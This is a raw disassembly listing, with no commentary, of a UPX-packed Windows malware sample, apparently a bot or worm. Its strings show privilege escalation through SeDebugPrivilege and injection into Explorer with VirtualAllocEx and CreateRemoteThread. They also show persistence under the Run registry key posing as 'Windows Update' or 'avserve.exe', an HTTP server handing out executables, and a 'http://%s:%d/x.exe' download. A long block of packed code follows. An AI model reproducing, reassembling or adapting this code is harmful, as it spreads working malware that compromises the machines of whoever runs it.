jmp short loc_30904C7A
; ---------------------------------------------------------------------------
align 8
loc_30904C78: ; CODE XREF: UPX0:loc_30904C70�j
; DATA XREF: sub_309017D2+5C�o
pop esp
pop esp
loc_30904C7A: ; CODE XREF: UPX0:30904C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_30904C84 dd 1CEC8166h dword_30904C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_30901D39+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_30901D39+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_30901D39+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_30901D39+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_30901D39+8�o
; sub_30902383+132�o
align 10h
aUterm17 db 'uterm17',0 ; DATA XREF: sub_30901DC1:loc_30901EA6�o
; UPX0:30902322�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_30901DC1+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_30901DC1:loc_30901E08�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_30901DC1+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_30901DC1+18�o
align 4
dword_30904D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3090204F+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3090204F+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3090204F+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3090204F+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3090230D�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_30902383+139�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_30902383+12B�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_30902383+124�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_30902383+117�o
align 4
aU17 db 'u17',0 ; DATA XREF: sub_30902383+105�o
aU16 db 'u16',0 ; DATA XREF: sub_30902383+F9�o
aU15 db 'u15',0 ; DATA XREF: sub_30902383+ED�o
aU14 db 'u14',0 ; DATA XREF: sub_30902383+E1�o
aU13i db 'u13i',0 ; DATA XREF: sub_30902383+D5�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_30902383+C9�o
aU12 db 'u12',0 ; DATA XREF: sub_30902383+BD�o
aU11 db 'u11',0 ; DATA XREF: sub_30902383+B1�o
aU10 db 'u10',0 ; DATA XREF: sub_30902383+A5�o
aU9 db 'u9',0 ; DATA XREF: sub_30902383+99�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_30902383+8D�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_30902383+81�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_30902383+75�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_30902383+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_30902383+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_30902383+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_30902383+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_30902383+3B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_30902383+22�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_309026E9+2D�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_30902195+23�o
; sub_309029BD+5F�o ...
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_30902195+1C�o
; sub_30902A6B+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_309015C7+4F�o
; sub_30902B37+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_30902B37+32�o
aClient db 'Client',0 ; DATA XREF: sub_30902B37+BC�o
; sub_30902B37+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_30902B37+37�o
; sub_30902B37+75�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_309029BD+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_309029BD+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_309029BD+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_309029BD+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_309029BD+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_309029BD+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_309029BD+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_309029BD+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_309029BD+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_309029BD+F�o
align 4
a1: ; DATA XREF: sub_30902B37+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_30904FB8 dd 0 ; sub_30902195+80�w
dword_30904FBC dd 0 ; sub_3090169C+5B�o ...
dword_30904FC0 dd 0 ; sub_3090204F:loc_309020FD�r ...
dword_30904FC4 dd 70h ; UPX0:3090232D�w ...
dword_30904FC8 dd 0 ; sub_30902383+33�w
dword_30904FCC dd 0 ; sub_309026E9+20�r
dword_30904FD0 dd 30900000h ; UPX0:30902312�w
dword_30904FD4 dd 0 ; sub_3090169C+52�o ...
dword_30904FD8 dd 0 ; UPX0:30902798�w
word_30904FDC dw 0 ; DATA XREF: sub_30902536+3B�r
; sub_3090259A:loc_309025FB�r ...
align 10h
dword_30904FE0 dd 0 ; sub_30902B37+110�w
align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 30905000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30905000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:30906B11�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 4D000201h
dd 40D47Eh, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 10h, 5000000h, 23h
dd 10h, 40h, 309000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 50h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 4000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 26000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 0E4000000h, 0Fh, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 0C000040h, 0C300002Fh, 4D000044h
dd 164868A0h, 8695B9AEh, 3D7D0302h, 9F6801A7h, 0BB21B736h
dd 4A20E676h, 5AB7CC3Ah, 0E43DB91Bh, 7684E066h, 0F42A706Ah
dd 7364796h, 0C8608CA4h, 97640A5Eh, 1939F0D9h, 2800847Ah
dd 4B003FA2h, 2ECDCB59h, 0C8B26C3Ch, 0A723BD98h, 167E2B2h
dd 3E500FDCh, 7EE8685Ch, 0ACA70DFCh, 0D328C00Dh, 431B138Ch
dd 0E54008C9h, 0EDCD2484h, 0DB0C7A04h, 0B212C5F8h, 0D62D5221h
dd 39EDB1Ch, 402EFDD9h, 4C7012DEh, 2719F844h, 40BCC06Ch
dd 1BDE5044h, 0D6336F5h, 94B71E10h, 0EEB6970Dh, 812193BFh
dd 0E87CACF9h, 1624A580h, 0B0250600h, 687E9F25h, 1C9D1C52h
dd 99DE1276h, 96F47258h, 650AEF36h, 4B1E7C6Ah, 7BC89C36h
dd 91BE490Ch, 0C93C3E49h, 90E1547Bh, 0DD92EDCCh, 8C9FE924h
dd 0CF782449h, 364052EDh, 0F88248CCh, 3331150Ch, 66F4C2C2h
dd 8707A02h, 9A85D0E8h, 0F4455E74h, 180B9D5Fh, 1C22F89Ah
dd 7F24E46Dh, 0FB5D07A8h, 5A4353Eh, 571282F8h, 0B0ACBF37h
dd 5A745781h, 74F80E14h, 8B74684Bh, 9BA09312h, 7E3D749Fh
dd 0FE709696h, 0A041209Ah, 73FC55FFh, 0FD859EDh, 50E4B9E8h
dd 0D59628ACh, 0E5BABF4h, 551802F0h, 3B0009F8h, 8CB303B1h
dd 0F47558E4h, 0C8718725h, 8B1807C1h, 7AD0D00Dh, 6FFDDFEDh
dd 3C418B00h, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 92FB818Ah, 1C68D8B4h, 9765D81Bh, 0F0C6966Ah, 868A301h
dd 0EC706312h, 0ED74ECF0h, 1110D70Dh, 9D1B0E82h, 14096C9Ah
dd 8B4DC2F4h, 0F8E1645Dh, 18185051h, 5A2A6897h, 1B15283Ah
dd 0CA115DB0h, 0D1AAEB03h, 0EB346B58h, 76AB57C4h, 599BB60Ch
dd 7C7DF055h, 3E4574CFh, 0EA5D4B3Eh, 500251F0h, 35ACEF53h
dd 0B84F07C4h, 0FAD68C27h, 6AD06A17h, 7789FF53h, 0C73BEC55h
dd 0EB290574h, 0C785CD1Bh, 684C90D8h, 0E59F60Eh, 0D5EB05FCh
dd 7B9CD0Ch, 49EF7408h, 0E86E1909h, 51513021h, 310F6000h
dd 144B2269h, 250D2D1Ah, 0B42BAEB8h, 0B1AFDD0Dh, 0FECB213h
dd 0B1133AE9h, 0F9C22D59h, 12BCB66Ah, 3C9EDC4Bh, 0A8500C80h
dd 614B7D50h, 2C50774Dh, 20195DC0h, 0A44598B7h, 7CAC437Ch
dd 51B8B024h, 0E2AA148Bh, 0AC96177Eh, 1A67FFFEh, 8861C280h
dd 3B461E14h, 80E97CF7h, 5D003B24h, 9ABADB78h, 2E445C54h
dd 57AC5A5Fh, 0A6030356h, 0A066DBCEh, 0B112732Fh, 0F0DCA5DDh
dd 56501950h, 8078AA00h, 77ACDC26h, 0F41EC495h, 71ED6DD1h
dd 0CFA6849h, 0D9C7FFF0h, 8936D32h, 2ACC3434h, 35AE4C2Eh
dd 0A753DB3h, 20BC500Ah, 27C2C01Ah, 0C6541874h, 3B7FB807h
dd 0B5BE3901h, 0C40452Fh, 801008Bh, 24448D51h, 0B36C265Fh
dd 113021D8h, 245903D3h, 9F09DD0Eh, 0BBCC1507h, 2FC82007h
dd 8678FF6Ch, 0F8C8E433h, 8510E7C1h, 0CF361A0Bh, 20087C8h
dd 33125D8Bh, 8E01C8E0h, 3393D2C4h, 951D5920h, 0B4B4C653h
dd 11DAAF66h, 25214537h, 4D6D3C3h, 0E7198370h, 0CCDB5ADh
dd 0F017B3C8h, 37359541h, 6899DC66h, 6C683D98h, 4FC044B7h
dd 63362C0Dh, 4D54FE47h, 8598BAA5h, 54DA149Bh, 81BF007Ch
dd 0A134775Fh, 7900B933h, 0C13BC72Bh, 0EDEE0272h, 0C18BDD76h
dd 0A1292BE1h, 0C70318B8h, 0C4B4AC23h, 3D9D52DFh, 6A117223h
dd 1B46F878h, 0EB4F6785h, 50E113C4h, 9EC9E446h, 1ED4112Dh
dd 3C681594h, 0DDC9AC59h, 3868030Bh, 0ACC73C97h, 533AB6B3h
dd 83525354h, 0D188FC12h, 0C29824D0h, 0DB04F404h, 57303347h
dd 0D0B1C8F4h, 86B6A7DDh, 0BF4ECDD9h, 68066068h, 0DDEEDB6h
dd 1D898068h, 55182784h, 0ADC014ECh, 0D489753Dh, 536200F2h
dd 0D26B027Bh, 3A01B304h, 0CD7780BCh, 0C54A39Ah, 0D5741A4Dh
dd 2F28D9E1h, 0CA3DCCDh, 9DE9784Ch, 0A4FEA336h, 565153FCh
dd 6B674B62h, 68D83A86h, 0FBE32656h, 5EF93370h, 10C25819h
dd 0A8499A05h, 56C05E69h, 0B7E80C4Bh, 895E93BFh, 50DEC5Dh
dd 1FFF25FFh, 0A1C33A04h, 0A3DD837Fh, 0E77443CCh, 84CC8A1Fh
dd 50DF74C9h, 0F57C666Bh, 3042EA26h, 90AFA540h, 646516E9h
dd 5F7B440Ch, 0A6BE8FEAh, 1FD814F8h, 4F689E48h, 2F670A20h
dd 1F0F09C7h, 0CF53E2EBh, 0B30455Fh, 904312E6h, 66DA7001h
dd 3CAEEBDDh, 11D6B033h, 3CD8023Eh, 0D6E61E98h, 68B4803Ah
dd 8CC115B0h, 0D0A3AB6Dh, 0C37C74E0h, 7B80EC66h, 0E41AC4A3h
dd 6652B73Dh, 4504ECF7h, 350D29E0h, 1AB91904h, 1BFB3826h
dd 23836833h, 0EBE4BD13h, 27DAFD8Dh, 997F1386h, 44C83569h
dd 3049C870h, 60403958h, 0B1C3AB90h, 4468D012h, 7AD89CF3h
dd 6C3816CDh, 0FC1543A3h, 0D72BFEC0h, 1BF61868h, 342404C7h
dd 640640Bh, 1C242C64h, 6406406h, 0C8080C14h, 0E4F3480h
dd 190004F6h, 0FC0E4B90h, 1F4F84Dh, 0EC019019h, 190190E8h
dd 0DCE0E490h, 0F42FC1F3h, 748D3959h, 4DD46839h, 0C989A8B1h
dd 0CC3D26D8h, 73C4064Dh, 0DD261217h, 0AA0BC0Dh, 7E472E49h
dd 6857D512h, 50F2195h, 0E0F1169Ch, 2745C822h, 876B9448h
dd 65D859F4h, 18FE5714h, 0EBA21388h, 824F0A09h, 311570E3h
dd 0C6D6CB5h, 695B091Ch, 0C2ABA480h, 0B37F8047h, 0B458A51h
dd 1EBB70A5h, 32FF7B0Eh, 4C3A52DBh, 38314D05h, 0ADF108FEh
dd 88253F5Dh, 7A90B5Dh, 35B70FCEh, 19FC06DCh, 99BAA4E0h
dd 0D603FEF7h, 0E32D97A3h, 80C3FE7Fh, 0BD72FFFBh, 7662C05Eh
dd 6ACC09D9h, 33750A5Fh, 1C2B6D68h, 84F5832h, 0D8040A81h
dd 0E201EDACh, 75950B09h, 63B04DA4h, 0D00F7586h, 0F2322536h
dd 8996CED6h, 0FF84323Dh, 86DFD703h, 81430F5Ah, 9F9C29FBh
dd 355D875Fh, 8426358Bh, 9E0C737Bh, 0A260D32Bh, 5B062FECh
dd 73B6DF3Ch, 0FEFF04FDh, 362D3CFCh, 887FCD7Eh, 8BC66BF7h
dd 0D9F93BA9h, 0DCB0EC59h, 0A0A33EAAh, 12CF9E57h, 572F3B01h
dd 59F8DC9Ch, 6C8712B7h, 0C1FF9A13h, 47EE75B3h, 0F812F0D6h
dd 0A6271068h, 0C0D3BED3h, 9E61E0E0h, 0A9337084h, 4B098996h
dd 0C81E4E56h, 0B15D3019h, 0B05C708Fh, 7AF07CCFh, 0CC4052F8h
dd 8301B90Bh, 68B0036Fh, 10414E4Ch, 0F0097B11h, 42BA2D6Eh
dd 80C60F6Ch, 9361600Bh, 0A43FDFEBh, 57935655h, 59DE0331h
dd 19E6D48Ah, 0E1A19871h, 1F0CA551h, 1BBBF4FDh, 14683624h
dd 0BF66753h, 38506A02h, 66816FF6h, 5325DD8h, 740096D2h
dd 35CC0918h, 711BD1Eh, 14190510h, 141C2776h, 6D84F00h
dd 6DAAE516h, 0C34FC207h, 0D5530D74h, 861051C7h, 17088407h
dd 18244C39h, 1B61DB3Ah, 0ED85EDFAh, 22AB117Eh, 144D2C26h
dd 0DDB064EFh, 0A2059661h, 750DF2EBh, 96E841DAh, 0DDEB65h
dd 23333F68h, 212E0583h, 0DF150C9Ch, 0AF0588D9h, 1408106Eh
dd 421C1BA9h, 182F5135h, 0D8D80256h, 183D90B2h, 3D563EF6h
dd 5C6311CEh, 182ADC74h, 0B74B2C61h, 2050D905h, 0FC081810h
dd 39C0B62h, 550F5EB0h, 575AC68Bh, 0AE759A2h, 182C562Eh
dd 53CEC990h, 27005556h, 845ACE59h, 0C520A2Bh, 9262CF04h
dd 0B55D0C03h, 89E20128h, 0DE5320C3h, 0F6F44E27h, 8E40B713h
dd 1E3C3A94h, 794E365Ch, 3E21D6F7h, 0F8DF0A38h, 0C960A433h
dd 687AEF16h, 7AD86035h, 0FAF66811h, 1B201210h, 0A604F77Ch
dd 477DF21Ch, 11E748Dh, 60FFFC81h, 1F563D02h, 0B5FF1C24h
dd 97905CE0h, 0FF4B457Ah, 0E1521F0Fh, 8D999B0h, 0EC465060h
dd 99D03876h, 0B789BDABh
dd 0E6E48038h, 0D00F5ED8h, 7C03C757h, 68D40624h, 72391C8Eh
dd 44DC50D8h, 30E43CE0h, 472391E7h, 0CEC18E8h, 0D14EF0F0h
dd 0F4CC1934h, 0A7DB0E0h, 0E26163BFh, 0F8BE637Ch, 51A28B7Dh
dd 3C18A164h, 3608B3C8h, 7571CBD8h, 1D200E17h, 9E9AA64Dh
dd 83370108h, 975B6A2h, 0B0448A46h, 0F4697881h, 74B08C47h
dd 5874AD09h, 81636A88h, 0AE598BB3h, 1BA184BBh, 3FC17A2Fh
dd 8303E083h, 9D5605C0h, 4A8B86B9h, 10C8CD52h, 186E459Dh
dd 0D6D73D11h, 0EE661C3Dh, 38140E26h, 0EF4250E1h, 0A161982Ch
dd 0CA402040h, 3E684B7Ch, 0B306AEC6h, 0D885CC59h, 25D31441h
dd 0F454CFA1h, 0E007B701h, 0F40962Bh, 88E76F84h, 0C5173EC1h
dd 14C7481Fh, 6DC017F7h, 52E02558h, 1D6AE0B2h, 71B8BF50h
dd 0C21840F5h, 743F51DCh, 0E8185737h, 0BB0A3060h, 1983CC77h
dd 52D1F628h, 0BC10F453h, 0CDFB9A53h, 0B1383D62h, 0CE590FEBh
dd 0F6CE8105h, 0EB68B632h, 96C0E374h, 0BB2665E2h, 0B3739868h
dd 0D4DC0D65h, 0DB9BB46h, 0B40D60B3h, 5EE2671Ah, 0EC6F4C12h
dd 0E74957A4h, 3BBBC631h, 90CCB64h, 0E0AE2CFDh, 118B790Bh
dd 0EB0C4807h, 0D1880E15h, 9CD6062h, 2BA1EA18h, 0C5C5053h
dd 0C5B34433h, 684FF83Eh, 11136A76h, 42A66E40h, 0FF00CCDFh
dd 0F8052105h, 199EFA10h, 1BF0F479h, 0DF7D5100h, 8D9A91A8h
dd 8114720Bh, 0B72D0BE9h, 4FB1E25h, 73170185h, 0C4312BECh
dd 23E18B0Ch, 8BD5BB5Bh, 5004E908h, 5C644353h, 63636100h
dd 495805h, 22C02A00h, 4BF1F110h, 20628F3h, 41535224h
dd 0FFFF8031h, 1BF4B77h, 838DF501h, 0EC527911h, 0F63AE42Ah
dd 0EA9B49E7h, 21AFBEE0h, 0FFFFFFFFh, 95447EDBh, 32615E1Ah
dd 6A1F85A0h, 94FF949Fh, 26A68439h, 1DCE358Fh, 0BC9A55Ch
dd 72657AB2h, 407FFFFFh, 7A6F4DABh, 616C6C69h, 302E342Fh
dd 6F632820h, 7461706Dh, 0FFF6B7FFh, 656C6269h, 534D203Bh
dd 36204549h, 69570915h, 776F646Eh, 544E2073h, 0FBA81776h
dd 312E3520h, 0BEE43429h, 104D400h, 0E79E7BC4h, 0A00EB47Bh
dd 4748090h, 0EFBE79E7h, 9580E68h, 6F743C48h, 0D49EC9B2h
dd 22204530h, 86FF4A10h, 309E7Ch, 631340F8h, 6C2E7676h
dd 72DB6B7Bh, 777E75h, 6C646507h, 0FF0F6597h, 666DFEF6h
dd 657365C1h, 68637261h, 6F721F0Eh, 63786F62h, 7376FF68h
dd 676E61E5h, 74651FD2h, 2E64720Ch, 7A6962h, 0B7C8DB0Bh
dd 68632861h, 0C6D616Bh, 0DB2D0674h, 78B17376h, 6C060024h
dd 37620E6Fh, 0DB7DED6Bh, 76264766h, 742E7A02h, 1111B76h
dd 74FB185Bh, 6E2E706Fh, 730F6917h, 0DB01FE27h, 788D330Ah
dd 7564610Fh, 652D746Ch, 1766FDB6h, 8072694Bh, 0A66E6F33h
dd 15804E73h, 2E74EDBEh, 694F6762h, 0B6FF3267h, 7800FBF6h
dd 6A2C6177h, 0AD6262h, 66617A9Bh, 6DF09161h, 5D2EA867h
dd 0AF5C2365h, 0FFFEDDBh, 64636261h, 68676665h, 6C6B6A69h
dd 71C56E6Dh, 0F975F772h, 76F8DFFFh, 7A797877h, 43424154h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 61FF5150h, 55547FB4h
dd 59585756h, 68231B5Ah, 3A707474h, 0CDF82F2Fh, 7325D81Dh
dd 97652F0Bh, 7068702Eh, 7DBF3D3Fh, 0F3D0E5Bh, 6E637326h
dd 69266406h, 8376666Eh, 3BBEDB94h, 2637313Dh, 0A01B7413h
dd 7B5DFDEBh, 313D58B0h, 1A83732h, 30383A31h, 7F652F30h
dd 0DFF646C0h, 0DFE800DFh, 66C9335Dh, 0EDB7FFB9h, 8D01EEFFh
dd 0FE8B0575h, 993C068Ah, 2C064607h, 99344630h, 0E2470788h
dd 1A17FBEDh, 0E80AEBF4h, 65DFAEDAh, 93712E67h, 0F701C999h
dd 12FF6FFFh, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0A91C14BAh, 0D8FF1A98h, 0F3C9FBADh, 8608F198h, 10C07102h
dd 37CB5F90h, 0C9965992h, 1CD9FD87h, 0E4143A78h, 0A7D7157h
dd 0CE45713Ah, 0F3F6DF7Dh, 8904F19Dh, 9C04F109h, 0C7764011h
dd 67B391FEh, 10F0E3F3h, 0B20BDC1Ch, 0C99B6059h, 0F7FB1EC7h
dd 14D90125h, 0CA17A104h, 8D2B9E71h, 230BD968h, 0AD9161CBh
dd 1D96E21Ah, 0B6CF2811h, 50B2F6B7h, 149900C8h, 255557DCh
dd 0F6A44E12h, 0C0F6EF6Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 1C3B71CBh, 7EEEC3D9h, 21E424FFh, 0CDCDCF1Ah, 812C668Fh
dd 0B64FFDDBh, 0B0FB1E3Fh, 0CDC383B8h, 0C9A85D12h, 0D93F1DCBh
dd 0AD2537CEh, 485A0B24h, 0FF6596A6h, 14C0B264h, 0A7294C1Bh
dd 0BA9CF3EBh, 0D9FBECFFh, 0F43416E9h, 0FCF57126h, 133BF90Eh
dd 0FF4629EFh, 6BFBBB37h, 66DE5F37h, 0AEA8EC47h, 0C5B70116h
dd 0ECE9EDFFh, 0B087DDE9h, 0FCB7FDF7h, 0CA012CE1h, 5AFCFCF5h
dd 0DFFFF2F2h, 0F7EBFCFEh, 0ABAAF5FCh, 0F934C7D6h, 25B459AAh
dd 0C9662A2Ah, 819093ACh, 0B3F85FB7h, 639D90FFh, 71CDC983h
dd 19BF3092h, 0D9145135h, 91720A95h, 76107FFFh, 0EBC8712Ah
dd 0D512A5D2h, 529AE180h, 8D146FAAh, 7F6F9A2Ah, 0B9C8FDA3h
dd 4A9A8B12h, 0AB9EC347h, 0A319DB9Bh, 0A26CEC20h, 0FFFEDFFFh
dd 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h, 0EB8D2E96h
dd 9A85D812h, 99D125Ah, 0E68584FFh, 0F8105A9Ah, 4922D096h
dd 0FEFD7F66h, 0B7B76D12h, 5AA987DDh, 850295C2h, 91048212h
dd 0DCF7CB5Ah, 0CFA033FCh, 53FF857Fh, 1872424Dh, 0FA5FC853h
dd 0FEFF84E7h, 50020062h, 54458343h, 0ADF64F57h, 4B52FFF1h
dd 4F525020h, 4D415247h, 17CD3120h, 4D4E414Ch, 4875A902h
dd 66AB0AB1h, 0DB4BB715h, 6B035BADh, 7075BB67h, 611A330Eh
dd 75BA5B0Fh, 32234D27h, 32322158h, 69AC2E32h, 0D6319533h
dd 323C2018h, 0E464AD8Bh, 773A419h, 42EDF60Dh, 23FF0C52h
dd 0A110400h, 0ED6F2014h, 0D4058D46h, 4C0069D0h, 5053534Bh
dd 443F8248h, 88297B7h, 0BB94AE0h, 57F6FCh, 64006E24h
dd 756F00h, 6F643A73h, 3074B62Fh, 398C0901h, 36233500h
dd 1D4B6E60h, 0DA00072Eh, 0E79019ABh, 0DA200844h, 49C19D57h
dd 39F26h, 0C80F46F2h, 47238360h, 64007h, 73FFE806h, 1F011023h
dd 0E0888A15h, 4F0048h, 0FFFEC044h, 6A19FE8Dh, 49E4F27Ah
dd 30AF281Ch, 67107425h, 429EE153h, 0DF5C89BEh, 4003075h
dd 5B5CD75Eh, 5ABD075Ch, 1B615C08h, 4DEBB91Bh, 36072Eh
dd 30772E38h, 0C4CD9D1Bh, 0EC0049B6h, 3F00E843h, 873C807Ch
dd 8A26463h, 907B04DCh, 1640B6FFh, 0DEDE00FFh, 16000E00h
dd 2602019Fh, 90984DFh, 3192840h, 0BEE1A360h, 0D96C8B11h
dd 1470D374h, 9BD65DF2h, 256B9C2Ah, 0B6D9EC0Eh, 480E109Fh
dd 0E7541B04h, 13EBAEB6h, 63265A54h, 0C75C2259h, 0FF9A41CBh
